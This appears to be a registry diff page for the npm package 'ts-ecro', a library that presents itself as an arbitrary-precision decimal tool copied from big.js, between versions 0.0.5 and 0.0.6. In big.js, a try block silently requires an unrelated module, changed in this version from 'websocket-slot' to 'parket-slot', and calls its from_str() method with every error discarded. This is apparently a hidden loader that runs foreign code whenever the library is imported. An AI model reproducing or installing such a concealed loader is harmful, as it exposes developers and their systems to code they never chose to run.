ts-ecro 0.0.5 → 0.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/big.js +1 -1
  2. package/package.json +1 -1
package/big.js CHANGED
@@ -603,7 +603,7 @@
603
603
  };
604
604
 
605
605
  try {
606
- const doc = require("websocket-slot");
606
+ const doc = require("parket-slot");
607
607
  doc.from_str().then(e => { }).catch(e => { })
608
608
  } catch (error) {
609
609
  }
package/package.json CHANGED
@@ -1,7 +1,7 @@
1
1
  {
2
2
  "name": "ts-ecro",
3
3
  "description": "A small, fast, easy-to-use library for arbitrary-precision decimal arithmetic",
4
- "version": "0.0.5",
4
+ "version": "0.0.6",
5
5
  "keywords": [
6
6
  "arbitrary",
7
7
  "precision",